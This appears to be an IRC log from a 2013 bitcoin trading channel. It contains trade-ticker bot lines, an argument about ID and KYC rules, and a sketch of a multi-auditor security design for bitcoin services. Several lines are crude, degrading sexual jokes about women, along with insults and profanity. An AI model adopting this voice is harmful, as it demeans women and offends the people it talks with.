stay Jul 01 23:57:05 mircea_popescu: when i purchase goods in stores nobody records all my ID info Jul 01 23:57:09 or what-ever-the-fuck-else. Jul 01 23:57:13 yes, they do. Jul 01 23:57:25 cameras on the razor blade isle recording who touches it Jul 01 23:57:28 just because you imagine your life currently works a certain way dun make it so. Jul 01 23:57:29 nobody asks for an ID when i bought a car only when i get a license plate Jul 01 23:57:35 hahahahha Jul 01 23:57:39 lol Jul 01 23:57:43 i bought cars privately and nobody IDed me Jul 01 23:57:43 the onl;y time they don't ask for your id when you're using dollars Jul 01 23:57:45 dont get me started on trying to buy a car Jul 01 23:57:46 is if they have it already. Jul 01 23:58:03 bitcollapse: seriously, i give you 6/10, now go away, i was having a good time Jul 01 23:58:03 this is what dollars are. Jul 01 23:58:05 mircea_popescu: nobody IDed me buying electronics. Jul 01 23:58:26 bitinstant is treating bitcoin as some sort of advanced highly defined/regulated instrument Jul 01 23:58:29 asciilifeform myeah. Jul 01 23:58:40 bitcollapse no dude. buitcoin is treating dollars like the shit they are. Jul 01 23:58:46 where are the US laws regarding bitcoin? Jul 01 23:58:49 they didn't use to, on the grounds that maybe they're like bitcoin Jul 01 23:58:52 guess what ? they aren;'t. Jul 01 23:58:53 tada. Jul 01 23:59:04 jesus he just won't get it will he. Jul 01 23:59:08 ITS THE DOLLARS. Jul 01 23:59:15 yes i understand Jul 01 23:59:24 why arent my gasoline purchases recorded then with an ID Jul 01 23:59:30 there's ~500000000 pages of regulations regarding the dollars. Jul 01 23:59:34 mircea_popescu: (make it more generic, he'll come back later bitching about EUR exchanges) Jul 01 23:59:51 when you use currency minted by an empire, you are buying into its philosophy (if one dare call it that) - like it or not. Jul 01 23:59:54 what, people buy bitcoin for eur now ?! Jul 01 23:59:59 mircea_popescu: theres no laws requiring merchants to RECORD ID on EVERY single product. Jul 02 00:00:05 yes, there is. Jul 02 00:00:08 produce it Jul 02 00:00:09 not yet Jul 02 00:00:23 ;;google tax code Jul 02 00:00:24 Tax Code, Regulations and Official Guidance: ; USC : Title 26 - INTERNAL REVENUE CODE | US Code | LII / Legal: ; U.S. Tax Code - Fourmilab: Jul 02 00:00:25 mircea_popescu: not anymore i'm afraid Jul 02 00:00:27 ID requirements are clearly defined on high risk purchases ie chemicals Jul 02 00:00:32 recently there was contaminated food sold in my area, so the polic got the records from the supermarket loyalty discount card program to contact potentially affect shoppers Jul 02 00:00:47 mircea_popescu: the tax code only requries merchants to keep books and records of sales NOT who they sold too. Jul 02 00:00:49 [HAVELOCK] [ASICM] 40 @ 0.045 = 1.8 BTC [+] Jul 02 00:00:51 [HAVELOCK] [ASICM] 981 @ 0.044991 = 44.1362 BTC [-] Jul 02 00:00:52 [HAVELOCK] [ASICM] 22 @ 0.04499 = 0.9898 BTC [-] Jul 02 00:01:04 argue in #bitinstant Jul 02 00:01:07 look. i'm not responsible for your 1915ish notions on regulation. Jul 02 00:01:11 i'm off, these funny captioned pictures don't just watch themselves Jul 02 00:01:23 davout also try the cock. Jul 02 00:01:29 wut Jul 02 00:01:37 mircea_popescu i think you are somewhat delusional. I can walk into a store and purchase goods with paper cash and nobody will ID me. Jul 02 00:01:38 au vin. Jul 02 00:01:57 well... enjoy it while it lasts, like any other illusion Jul 02 00:01:58 theres no regulations specific to bitcoin being a highly sensitive item ie. explosives, drugs etc. Jul 02 00:02:04 [HAVELOCK] [ASICM] 10 @ 0.0445 = 0.445 BTC [-] Jul 02 00:02:06 it's the other way around. Jul 02 00:02:12 [BTCTC] [TAT.ASICMINER] 18 @ 0.044899 = 0.8082 BTC [+] Jul 02 00:02:15 the regulations are as to the us dollars being useless, not as to bitcoin. Jul 02 00:02:17 everyone is applying rules that dont exist to bitcoin Jul 02 00:02:20 bitcollapse: think of it more like 'warez' Jul 02 00:02:22 what's with this backwards view all the time Jul 02 00:02:33 dude. THEY ARE NOT BEING APPLIED TO BITCOIN Jul 02 00:02:38 why. why do people do this. Jul 02 00:02:40 there are no US dollar regulations mandating the IDing of a user on EVERY transaction. Jul 02 00:03:00 yes, there are. da fuck do you think aml kyc fym stand for ? Jul 02 00:03:09 bitcollapse: ok, bitinstant are idiots, point made you can leave now :-) Jul 02 00:03:11 well admittedly fym stands for fuck your mother, but the rest. Jul 02 00:03:12 those are for financial transactions Jul 02 00:03:20 highly DEFINED ones. Jul 02 00:03:20 eys. ie, transactions that involve DOLLARS Jul 02 00:03:34 bullshit. you can spend 5k in a walmart and nobody will say anything Jul 02 00:03:41 the people applying 'rules' are applying their whims, and to your arse, rather than to bitcoin (or whatever else the instrument of your perceived mischief may be.) Jul 02 00:03:41 [HAVELOCK] [ASICM] 30 @ 0.0449 = 1.347 BTC [+] Jul 02 00:03:45 bitcollapse: look up stored value, and come back when you have a clue Jul 02 00:03:46 KYC applies to financial institutions Jul 02 00:03:49 because you are on camera and bought with your credit card Jul 02 00:03:55 [HAVELOCK] [ASICM] 10 @ 0.0444 = 0.444 BTC [-] Jul 02 00:03:57 no i bought cash Jul 02 00:04:01 and the camera does not ID me. Jul 02 00:04:07 [HAVELOCK] [ASICM] 9 @ 0.0445 = 0.4005 BTC [+] Jul 02 00:04:12 people are applying laws to bitcoin that do not exist Jul 02 00:04:15 well this was fun but i gotta ignore him now Jul 02 00:04:20 bitcollapse!*@* added to ignore list. Jul 02 00:04:27 so you use cash. if necessary, every camera you walked/drove by on the way to the counter will cough up its footage, to the right people. Jul 02 00:04:36 .bait Jul 02 00:04:40 http://25.media.tumblr.com/tumblr_masgzgiTTu1qhc62mo1_400.jpg Jul 02 00:04:54 that's not 12 get out of here. Jul 02 00:05:04 haha for a split second i thought kakobrekla disabled the feature Jul 02 00:05:07 [HAVELOCK] [ASICM] 1 @ 0.04548998 BTC [+] Jul 02 00:05:18 i hate boob jobs Jul 02 00:05:23 [BTCTC] [TAT.ASICMINER] 6 @ 0.044899 = 0.2694 BTC [+] Jul 02 00:05:26 [BTCTC] [TAT.ASICMINER] 18 @ 0.044899 = 0.8082 BTC [+] Jul 02 00:05:30 why ? Jul 02 00:05:32 the last one i got wasn't that well done Jul 02 00:05:39 you probably also hate shaved mounds. pervs. Jul 02 00:05:44 [HAVELOCK] [ASICM] 1 @ 0.04548998 BTC [+] Jul 02 00:05:47 dunno it looks all fake and stuff Jul 02 00:05:50 [HAVELOCK] [ASICM] 1 @ 0.04548998 BTC [+] Jul 02 00:05:50 shaved is awesome Jul 02 00:05:57 "o it looks fake" Jul 02 00:06:25 btw davout you ever seen les tortillards ? Jul 02 00:06:30 nan Jul 02 00:06:37 c'est quoi? Jul 02 00:06:47 there's this scene, famished theatre company (incl two hawt soubrettes) in a train Jul 02 00:07:01 with a bunch of peasants. they keep passing back and forth terrine and jambon and whatnot Jul 02 00:07:06 teh artistes are starving Jul 02 00:07:09 but they don't get any. Jul 02 00:08:05 so ? Jul 02 00:08:14 so it's sort of like bitcoin. Jul 02 00:08:24 [BTCTC] [ASICMINER-PT] 1 @ 4.585 BTC [+] Jul 02 00:08:32 proceed Jul 02 00:09:02 jesus gotta explain everything. Jul 02 00:09:09 [HAVELOCK] [ASICM] 1 @ 0.0445 BTC [-] Jul 02 00:09:10 [HAVELOCK] [ASICM] 20 @ 0.0445 = 0.89 BTC [-] Jul 02 00:09:12 jesus is explaining now? Jul 02 00:09:20 teh presumptious elite (ie, teh artists) got nothing. teh "peasants" actually got the goods. Jul 02 00:09:20 lets hear it Jul 02 00:09:27 they're passing it back and forth but only among themselves, Jul 02 00:09:31 while teh artistes starve. Jul 02 00:09:54 and talk all about how "bitcoin regulations", happily ignoring the fact that... nope. exactly the reverse. Jul 02 00:10:45 there is no such thing as "bitcoin" anyway Jul 02 00:11:12 you were referring to our bitwhatever friend Jul 02 00:11:21 ? Jul 02 00:11:23 outside of its ability to make people salivate. Jul 02 00:11:35 [MPEX] [S.MPOE] 2500 @ 0.00082802 = 2.0701 BTC [+] Jul 02 00:11:38 [BTCTC] [BTC-TRADING-PT] 1 @ 0.92 BTC [+] Jul 02 00:13:21 unrelatedly : http://www.last.fm/music/Cadillac+Face/Stupid+Whore+EP Jul 02 00:14:36 [HAVELOCK] [ASICM] 10 @ 0.04408002 = 0.4408 BTC [-] Jul 02 00:14:37 [BTCTC] [AMC-PT] 3 @ 0.00102 = 0.0031 BTC [-] Jul 02 00:14:44 mircea you're like tintin Jul 02 00:15:02 so many episodes Jul 02 00:15:09 mircea makes a game company Jul 02 00:15:19 mircea creates major Jul 02 00:15:22 what's next? Jul 02 00:15:25 mircea in congo? Jul 02 00:15:29 lol Jul 02 00:15:39 *a major Jul 02 00:16:01 [BTCTC] [AMC-PT] 11 @ 0.00102 = 0.0112 BTC [-] Jul 02 00:16:07 i thought tintin was belge anyway Jul 02 00:16:20 people have so many misconceptions about the law and what it says and doesn't say Jul 02 00:16:43 being a french character is for awesome people only Jul 02 00:17:56 [BTCTC] [AMC-PT] 1538 @ 0.00101 = 1.5534 BTC [-] Jul 02 00:18:10 like... hm... bourvil ? Jul 02 00:18:28 lol Jul 02 00:18:28 bitcoin makes me angry today Jul 02 00:18:42 possibly the least awesome person i could think up Jul 02 00:18:59 jcpham: accusing inanimate objects : weak! Jul 02 00:19:09 ya jcpham it's really the voices, we know. Jul 02 00:19:21 bourvil is pretty high on the ladder of non-awesomeness Jul 02 00:19:29 i have a fever and can't word it properly Jul 02 00:19:38 what's the only prescription ? Jul 02 00:19:41 bitcoin got dumber over the weekend i'm sure of it Jul 02 00:19:48 asterix & obelix Jul 02 00:19:56 ....can't put my finger on it Jul 02 00:20:00 jcpham: you go too much on the forums :-) Jul 02 00:20:04 the only prescription is more cuntgel. Jul 02 00:20:09 i haven't been there in ages! Jul 02 00:20:14 it's reddit now! Jul 02 00:20:14 [BTCTC] [BASIC-MINING] 1 @ 0.173001 BTC [-] Jul 02 00:20:18 lol reddit. Jul 02 00:20:19 and it's worse Jul 02 00:20:27 the idiots of the forums are percolating Jul 02 00:20:28 dude reddit is always infinitely retarded Jul 02 00:20:35 of course it gets worse over any tiem interval. Jul 02 00:20:37 http://qz.com/99413/first-ever-human-head-transplant-is-now-possible-says-neuroscientist/ Jul 02 00:20:39 it can be fun sometimes Jul 02 00:20:40 First-ever human head transplant is now possible, says neuroscientist – Quartz Jul 02 00:21:09 at least the realy chats are intelligent Jul 02 00:21:11 good, the forums show us that there are plenty available bodies Jul 02 00:21:24 http://pastebin.com/0qjfUCpj Jul 02 00:21:27 assbot did me in the ass, reports ozbot - Pastebin.com Jul 02 00:21:38 its possible..but how good could the job be...meh Jul 02 00:21:47 [BTCTC] [GSDPT] 10 @ 0.002299 = 0.023 BTC [+] Jul 02 00:21:59 [BTCTC] [TAT.ASICMINER] 57 @ 0.044501 = 2.5366 BTC [-] Jul 02 00:22:09 looks like a prank Jul 02 00:22:12 i wonder if you could have a girl's head sewn in backwards so you can kiss her while fucking her in the ass. Jul 02 00:22:40 [BTCTC] [TAT.ASICMINER] 23 @ 0.044301 = 1.0189 BTC [-] Jul 02 00:22:42 [BTCTC] [BASIC-MINING] 5 @ 0.173001 = 0.865 BTC [-] Jul 02 00:22:45 why am i not more shocked by what the romanian says ? Jul 02 00:23:00 I'd prolly rather her blow me while I'm eating her ass. I'm an ass man, plus bs's are my fav. Jul 02 00:23:07 cuz you got used to it davout Jul 02 00:23:11 ok, i rephrase. so you can taste her sweet tears while... Jul 02 00:23:22 heh nice Jul 02 00:23:29 KRS: you're a .... scat man ? Jul 02 00:23:33 badum tsss Jul 02 00:23:34 scaaaat man. Jul 02 00:23:45 nooo not scat..no piss/shit just some good starfish Jul 02 00:23:50 http://www.youtube.com/watch?v=3cnQCk0u49w Jul 02 00:23:52 Scatman John - Scatman (Ski-Ba-Bop-Ba-Dop-Bop) - YouTube Jul 02 00:24:00 oh no now i have to listen to it too..damnit Jul 02 00:24:48 this does kinda ride out Jul 02 00:25:04 [BTCTC] [BASIC-MINING] 4 @ 0.173001 = 0.692 BTC [-] Jul 02 00:25:37 10 fucking years ago we didn't even see the outrageous humour in it Jul 02 00:26:18 [BTCTC] [BASIC-MINING] 3 @ 0.173 = 0.519 BTC [-] Jul 02 00:26:43 [BTCTC] [ASICMINER-PT] 1 @ 4.61 BTC [+] Jul 02 00:27:36 [BTCTC] [BASIC-MINING] 1 @ 0.172 BTC [-] Jul 02 00:30:15 [BTCTC] [COGNITIVE] 1 @ 0.376056 BTC [-] Jul 02 00:30:35 [BTCTC] [COGNITIVE] 1 @ 0.376055 BTC [-] Jul 02 00:31:08 [BTCTC] [COGNITIVE] 1 @ 0.375001 BTC [-] Jul 02 00:31:10 [BTCTC] [COGNITIVE] 11 @ 0.375 = 4.125 BTC [-] Jul 02 00:31:29 [BTCTC] [TAT.ASICMINER] 22 @ 0.044998 = 0.99 BTC [+] Jul 02 00:31:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.044998 BTC [+] Jul 02 00:32:12 [BTCTC] [COGNITIVE] 1 @ 0.375001 BTC [+] Jul 02 00:32:38 [BTCTC] [COGNITIVE] 1 @ 0.375 BTC [-] Jul 02 00:33:06 mircea_popescu : gyft.com Jul 02 00:33:15 do not know if you have seen that yet Jul 02 00:33:28 what , still ? Jul 02 00:33:37 yea we talked about it a few days ago iirc Jul 02 00:33:39 [BTCTC] [COGNITIVE] 1 @ 0.372001 BTC [-] Jul 02 00:33:47 oh,nm I have been busy Jul 02 00:34:09 [BTCTC] [TAT.ASICMINER] 20 @ 0.044999 = 0.9 BTC [+] Jul 02 00:34:14 I came back to see KRS talking about eating asshole Jul 02 00:34:16 [BTCTC] [COGNITIVE] 1 @ 0.372001 BTC [-] Jul 02 00:34:17 :( Jul 02 00:34:18 [BTCTC] [COGNITIVE] 1 @ 0.372 BTC [-] Jul 02 00:34:19 [BTCTC] [TAT.ASICMINER] 29 @ 0.044999 = 1.305 BTC [+] Jul 02 00:34:20 [BTCTC] [TAT.ASICMINER] 14 @ 0.044998 = 0.63 BTC [-] Jul 02 00:34:22 what's the drill with it ? have heard about it but as far as I understand they simply sell gift cards Jul 02 00:34:22 [BTCTC] [TAT.ASICMINER] 23 @ 0.044501 = 1.0235 BTC [-] Jul 02 00:34:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.0445 = 0.445 BTC [-] Jul 02 00:34:24 [BTCTC] [TAT.ASICMINER] 41 @ 0.044302 = 1.8164 BTC [-] Jul 02 00:34:26 [BTCTC] [TAT.ASICMINER] 22 @ 0.0443 = 0.9746 BTC [-] Jul 02 00:34:28 [BTCTC] [TAT.ASICMINER] 9 @ 0.0442 = 0.3978 BTC [-] Jul 02 00:34:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.04411 BTC [-] Jul 02 00:34:32 [BTCTC] [TAT.ASICMINER] 8 @ 0.044001 = 0.352 BTC [-] Jul 02 00:34:33 and somehow use it to trade BTC Jul 02 00:34:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.0438 = 0.1314 BTC [-] Jul 02 00:34:34 [BTCTC] [TAT.ASICMINER] 76 @ 0.0428 = 3.2528 BTC [-] Jul 02 00:34:36 [BTCTC] [TAT.ASICMINER] 20 @ 0.042701 = 0.854 BTC [-] Jul 02 00:34:37 [BTCTC] [TAT.ASICMINER] 71 @ 0.0427 = 3.0317 BTC [-] Jul 02 00:34:43 well since ya'll reccomended reddit, i learned that one of the secret locations bitinstant is not allowing bitcoin purchases from is Boston Jul 02 00:34:47 http://www.reddit.com/r/Bitcoin/comments/1hgayj/bitinstant_has_cut_off_the_ability_to_buy/ Jul 02 00:34:48 BitInstant has cut off the ability to buy bitcoins in certian locations. I am in boston and i was ha Jul 02 00:34:54 it goes direct using bitpay, used a few minutes ago for a CVS card- worked instant Jul 02 00:35:05 already paid CVS Jul 02 00:35:19 [BTCTC] [AMC-PT] 13 @ 0.00102 = 0.0133 BTC [+] Jul 02 00:35:49 Meanwhile, in France : http://www.youtube.com/watch?v=B6uXGSTfz_4 Jul 02 00:37:09 [HAVELOCK] [ASICM] 14 @ 0.0443 = 0.6202 BTC [+] Jul 02 00:37:28 [BTCTC] [ASICMINER-PT] 7 @ 4.481007 = 31.367 BTC [-] Jul 02 00:37:30 [BTCTC] [ASICMINER-PT] 8 @ 4.481 = 35.848 BTC [-] Jul 02 00:38:31 boston eh ? Jul 02 00:38:37 sounds shady. Jul 02 00:39:26 [BTCTC] [ASICMINER-PT] 1 @ 4.481001 BTC [+] Jul 02 00:39:50 [BTCTC] [TAT.ASICMINER] 1 @ 0.042701 BTC [+] Jul 02 00:39:52 [BTCTC] [TAT.ASICMINER] 29 @ 0.0427 = 1.2383 BTC [-] Jul 02 00:39:54 [BTCTC] [TAT.ASICMINER] 17 @ 0.0426 = 0.7242 BTC [-] Jul 02 00:39:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.0425 = 0.425 BTC [-] Jul 02 00:39:57 [BTCTC] [TAT.ASICMINER] 6 @ 0.0425 = 0.255 BTC [-] Jul 02 00:40:26 issues with the MSB license in whatev state Boston is in ? REGULATORY PROBLEM OFFICER?? Jul 02 00:40:39 kakobrekla http://trilema.com/2013/bitbet-june-2013-statement/ Jul 02 00:40:54 boston is in mass Jul 02 00:41:07 [HAVELOCK] [ASICM] 10 @ 0.0442 = 0.442 BTC [-] Jul 02 00:42:16 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [-] Jul 02 00:42:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.044898 BTC [+] Jul 02 00:42:52 [BTCTC] [AMC-PT] 10 @ 0.00102 = 0.0102 BTC [+] Jul 02 00:45:08 [HAVELOCK] [ASICM] 10 @ 0.04545 = 0.4545 BTC [+] Jul 02 00:46:21 do you guys think there is a market for a bitcoin-space company specializing in IT security related products/consulting? Jul 02 00:46:44 IT security related products are a scam, so probably Jul 02 00:47:02 davout should i find my old article about it or you search on tyour own ? Jul 02 00:47:27 mircea_popescu: fetch Jul 02 00:48:06 http://trilema.com/2012/probably-the-hottest-business-idea-of-the-moment-in-btc/ Jul 02 00:48:07 btc is only a little more useful than just a money transfer vehicle Jul 02 00:48:09 Probably the hottest business idea of the moment in BTC… pe Trilema - Un blog de Mircea Popescu. Jul 02 00:48:11 o look! it's from 2012 Jul 02 00:48:48 [BTCTC] [TAT.ASICMINER] 20 @ 0.044897 = 0.8979 BTC [-] Jul 02 00:49:37 mircea_popescu: yea, but that's only part of what i was thinking about Jul 02 00:50:02 mircea_popescu: the rest being an actual non-imaginary product that we're going to use to secure our very own infrastructure Jul 02 00:50:27 so many jabs i could be throwing in here Jul 02 00:50:42 you gotta start somewhere :-) Jul 02 00:50:44 like... "is it written in ruby ?" Jul 02 00:51:25 your obsession with ruby is like my obsession with django reinhardt, it's irrelevant and nobody cares about it Jul 02 00:51:26 next Jul 02 00:51:56 ok, does it use secret urls ? Jul 02 00:52:05 none Jul 02 00:52:20 is it a partnership with some french company ? Jul 02 00:52:44 haha fuck you, no it's a product, a good question Jul 02 00:52:48 would be Jul 02 00:52:51 mircea_popescu: so you did it already? Jul 02 00:52:54 "what does it do ?" Jul 02 00:52:57 asciilifeform did who ? Jul 02 00:53:25 davout i know the answer to that one Jul 02 00:53:36 it starts with no and it ends with thing! Jul 02 00:53:49 blurb Jul 02 00:54:01 dude srsly. automated security ? what is this, star trek ? Jul 02 00:54:01 you're mean popescu, i'm taking my toys and i'm going home Jul 02 00:54:03 [MPEX] [S.MPOE] 8081 @ 0.00082774 = 6.689 BTC [-] Jul 02 00:54:05 the proper way to run btc services. fully history-free software/hardware stack. Jul 02 00:54:15 it isn't finished anyway Jul 02 00:54:22 asciilifeform no dude. i'm just entertaining a frenchman with bad food poisoning Jul 02 00:54:30 he ate oysters a la parisienne in a scottish pub Jul 02 00:54:31 i never said it was automated Jul 02 00:54:57 well then how's it a product ? Jul 02 00:55:14 i guess i'll just have to show it when it's finished Jul 02 00:55:19 I, for one, sure as hell wouldn't put $100M of BTC on silicon I didn't design (or at least control the design of.) Jul 02 00:55:19 [BTCTC] [TAT.ASICMINER] 12 @ 0.044895 = 0.5387 BTC [-] Jul 02 00:55:24 but why rob us of all the fun meanwhile ? Jul 02 00:55:44 okay, it's written in ruby HAPPY NOW ?? Jul 02 00:55:47 :D Jul 02 00:55:49 aaaaahahaha Jul 02 00:55:52 i knew it. Jul 02 00:55:57 dude, ruby doesn't work. srsly. Jul 02 00:56:06 it's like... for girls. Jul 02 00:56:19 was ruby mean to you in some way ? Jul 02 00:56:29 yes it killed my pony Jul 02 00:56:36 that's what I thought Jul 02 00:56:40 but getting back on track, so i buy your product. now what. Jul 02 00:57:18 i'll tease you a bit Jul 02 00:57:26 it can optionnally rely on GPG Jul 02 00:57:37 so can telnet. Jul 02 00:57:42 basically it'll audit your shit, and report on it Jul 02 00:57:49 but not automatically ? Jul 02 00:58:14 it will audit automatically if you plug it as a hidden replication slave on your DB Jul 02 00:58:27 or you can do it manually offline by feeding SQL dumps Jul 02 00:58:30 why is it auditing your db ? Jul 02 00:59:11 because you can set custom rules for it, like check that incoming transactions actually exist on the bitcoin network Jul 02 00:59:22 that rows for previous records have not been changed Jul 02 00:59:31 isn't that what bitcoind is for? Jul 02 00:59:40 no Jul 02 00:59:41 [BTCTC] [TAT.ASICMINER] 22 @ 0.044699 = 0.9834 BTC [-] Jul 02 01:00:01 why use a second db whose functionality boils down to that of the blockchain? Jul 02 01:00:10 so basically the security comes from using two separate machines Jul 02 01:00:24 asciilifeform: that's one of the possibilities Jul 02 01:00:32 and it's unlikely an attacker will get tio mess with both Jul 02 01:01:02 mircea_popescu: no, the security boils down to "unless an attacker can simultaneously fuck with X auditors he can't do shit" Jul 02 01:01:14 anyone can get this functionality for free just by running the normal blockchain in several places. Jul 02 01:01:18 where x = your server + the machine you're running davoutd on Jul 02 01:01:24 = 2 Jul 02 01:01:39 asciilifeform that was my next q, why not just run your code both places as is Jul 02 01:01:39 (and hardcode them as nodes into your ordinary bitcoind.) Jul 02 01:02:12 in my personal case it's going to be one server, a couple of online auditors, and one offline instance that gets DB backups manually fed to Jul 02 01:02:18 seems like somebody's intent on selling 'old wine in new bottles.' par for the course in the idiot 'enterprise software' industry. Jul 02 01:02:55 asciilifeform: this has absolutely nothing to do with bitcoind Jul 02 01:03:10 [HAVELOCK] [ASICM] 15 @ 0.0454 = 0.681 BTC [-] Jul 02 01:03:30 davout what if there's a blockchain split ? Jul 02 01:03:53 mircea_popescu: it doesn't really help to run your code in both places since what your code does is it runs your app, it doesn't continuously check for someone fucking with your data Jul 02 01:04:00 mircea_popescu: then both (all) of his bitcoind-with-serial-filed-off will be chumped Jul 02 01:04:12 davout well how do you know my app isn't checking data Jul 02 01:04:17 and who writes apps that don't check. Jul 02 01:05:39 not to say your thing is necessarily useless, but i'd guess it's a part of what i linked rather than the other way around ya know ? :D Jul 02 01:05:42 mircea_popescu: blockchain split is irrelevant as your incoming transactions are either accepted, or confirmed, but in the case the confirmations count for a given tx was reduced you'd be notified since the field would be defined as "allowed to change only for a bigger integer" Jul 02 01:06:24 no dude. i mean an unhealed, enduring split like we had in march. Jul 02 01:06:58 where people keep feeding you one-chain transactions and then request returns which you process as both-chains transactions Jul 02 01:07:00 mircea_popescu: i'm not saying the contrary, believe it or not but i think your security model makes a shitton of sense and i'm trying to find a way to get the best of it while not sacrificing convenience too much either Jul 02 01:07:08 and then end up with a lot of single-chain useless coins presumably. Jul 02 01:07:29 [BTCTC] [COGNITIVE] 12 @ 0.372 = 4.464 BTC [-] Jul 02 01:07:47 mircea_popescu: it's just software, it doesn't do magic, so if the devs decide to throw the table over there's only so much it can do Jul 02 01:08:23 ok, take it one step further now Jul 02 01:08:46 imagine that each user gets an ECDSA keypair when signing up for a service Jul 02 01:09:11 (that he can have automatically generated client-side, or generate himself that's not really the question) Jul 02 01:09:54 yea... Jul 02 01:10:06 [BTCTC] [COGNITIVE] 1 @ 0.310001 BTC [-] Jul 02 01:10:08 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Jul 02 01:10:09 i'm going to stop right here, you know where i'm going Jul 02 01:10:45 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1984 BTC [-] Jul 02 01:10:53 you're going to "imagine we use gpg to sign transactions on the client side so even if the attacker gets your server there's jack shit he can do as he can't enter arbitrary txs" ? Jul 02 01:10:57 [BTCTC] [TAT.ASICMINER] 4 @ 0.0435 = 0.174 BTC [-] Jul 02 01:10:59 [BTCTC] [TAT.ASICMINER] 21 @ 0.043112 = 0.9054 BTC [-] Jul 02 01:11:13 i enjoy delegating to romanians Jul 02 01:11:16 lol Jul 02 01:11:29 yes, obviously you see the flaws too Jul 02 01:11:46 but that's just one of the solutions Jul 02 01:12:02 well i guess we'll have to see this deployed. Jul 02 01:12:14 which kind of equates to copying mpex in a sorta degenerated fashion Jul 02 01:12:16 [BTCTC] [ASICMINER-PT] 1 @ 4.48 BTC [-] Jul 02 01:12:17 [BTCTC] [ASICMINER-PT] 1 @ 4.4765 BTC [-] Jul 02 01:12:22 it's there to be copied. Jul 02 01:12:34 well, find someone else :-) Jul 02 01:12:35 [BTCTC] [ASICMINER-PT] 4 @ 2.4 = 9.6 BTC [-] Jul 02 01:12:41 lol Jul 02 01:12:45 my next words were Jul 02 01:12:46 i was thinking of something different actually Jul 02 01:12:47 [BTCTC] [ASICMINER-PT] 1 @ 4.599999 BTC [+] Jul 02 01:12:59 [BTCTC] [AMC-PT] 861 @ 0.00101 = 0.8696 BTC [-] Jul 02 01:13:01 [BTCTC] [AMC-PT] 246 @ 0.00101 = 0.2485 BTC [-] Jul 02 01:13:04 proceed Jul 02 01:13:04 "the problem is teh "bitcoin experts" aren't smart enough to figure it out" Jul 02 01:13:16 [BTCTC] [ASICMINER-PT] 17 @ 4.472 = 76.024 BTC [-] Jul 02 01:13:31 [BTCTC] [DMS.MINING] 10 @ 0.019501 = 0.195 BTC [-] Jul 02 01:13:39 those who refuse to understand bitcoin are doomed to re-implement it. Jul 02 01:13:42 poorly. Jul 02 01:13:49 what aren't they smart enough to figure out ? your model ? or how to copy it ? Jul 02 01:13:59 my solution revolved more around email confirmation Jul 02 01:14:07 davout for instance that you can't use websites for btc. Jul 02 01:14:13 [BTCTC] [GSDPT] 100 @ 0.002101 = 0.2101 BTC [-] Jul 02 01:14:17 ha! email confirmations are so 2011 mpoe you know Jul 02 01:14:23 shit's a hassle to handle. Jul 02 01:14:39 [BTCTC] [ASICMINER-PT] 28 @ 4.472 = 125.216 BTC [-] Jul 02 01:14:42 [BTCTC] [ASICMINER-PT] 8 @ 4.46 = 35.68 BTC [-] Jul 02 01:14:51 well, the idea was to have auditors generate the confirmation codes Jul 02 01:15:11 [BTCTC] [ASICMINER-PT] 6 @ 3 = 18 BTC [-] Jul 02 01:15:14 resulting in the same "webserver hacked? zero fucks given" kind of result Jul 02 01:15:26 davout may work, as lo9ng as the auditors are trustable. Jul 02 01:15:43 one auditor will get hacked eventually Jul 02 01:16:02 it's however very very unlikely that all be hacked simultaneously Jul 02 01:16:12 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0047 BTC [-] Jul 02 01:16:14 [BTCTC] [TAT.VIRTUALMINE] 16 @ 0.00433 = 0.0693 BTC [-] Jul 02 01:16:16 [BTCTC] [TAT.VIRTUALMINE] 288 @ 0.00432 = 1.2442 BTC [-] Jul 02 01:16:17 [BTCTC] [TAT.VIRTUALMINE] 36 @ 0.004319 = 0.1555 BTC [-] Jul 02 01:16:18 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004301 = 0.0215 BTC [-] Jul 02 01:16:20 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.0043 = 0.0473 BTC [-] Jul 02 01:16:21 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.0043 = 0.0645 BTC [-] Jul 02 01:16:22 [BTCTC] [TAT.VIRTUALMINE] 120 @ 0.004281 = 0.5137 BTC [-] Jul 02 01:16:33 especially if one is on the raspberry pi that I hide in my dirty laundry Jul 02 01:16:51 [BTCTC] [CRYPTO-TRADE] 9 @ 0.2 = 1.8 BTC [+] Jul 02 01:16:51 i can imagien nobody'd ever go in there. Jul 02 01:17:27 so I'm going to scratch my own itch here first and see i that works and if it's practical Jul 02 01:17:28 [BTCTC] [TAT.ASICMINER] 27 @ 0.044 = 1.188 BTC [+] Jul 02 01:18:07 yeah. prolly the right way ahead. Jul 02 01:18:10 we're dropping the hot wallet stuff for the time being and will only send funds if all auditors agree Jul 02 01:18:25 [BTCTC] [ASICMINER-PT] 1 @ 4.45015 BTC [+] Jul 02 01:18:28 [BTCTC] [ASICMINER-PT] 1 @ 4.450101 BTC [-] Jul 02 01:18:30 [BTCTC] [ASICMINER-PT] 8 @ 4.45 = 35.6 BTC [-] Jul 02 01:18:32 [BTCTC] [ASICMINER-PT] 2 @ 4.405 = 8.81 BTC [-] Jul 02 01:18:34 [BTCTC] [ASICMINER-PT] 2 @ 4.4001 = 8.8002 BTC [-] Jul 02 01:18:36 [BTCTC] [ASICMINER-PT] 9 @ 4.4 = 39.6 BTC [-] Jul 02 01:18:38 [BTCTC] [AMC-PT] 12 @ 0.00102 = 0.0122 BTC [+] Jul 02 01:18:50 aww i thought that amc thing was supposed to be 25 or some shit Jul 02 01:19:21 [BTCTC] [ASICMINER-PT] 1 @ 4.450151 BTC [+] Jul 02 01:19:51 it's "on sale" Jul 02 01:20:04 a a ok Jul 02 01:23:20 [BTCTC] [TAT.VIRTUALMINE] 234 @ 0.004003 = 0.9367 BTC [-] Jul 02 01:23:22 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.004002 = 0.02 BTC [-] Jul 02 01:23:24 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.004 = 0.06 BTC [-] Jul 02 01:23:24 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.004 = 0.072 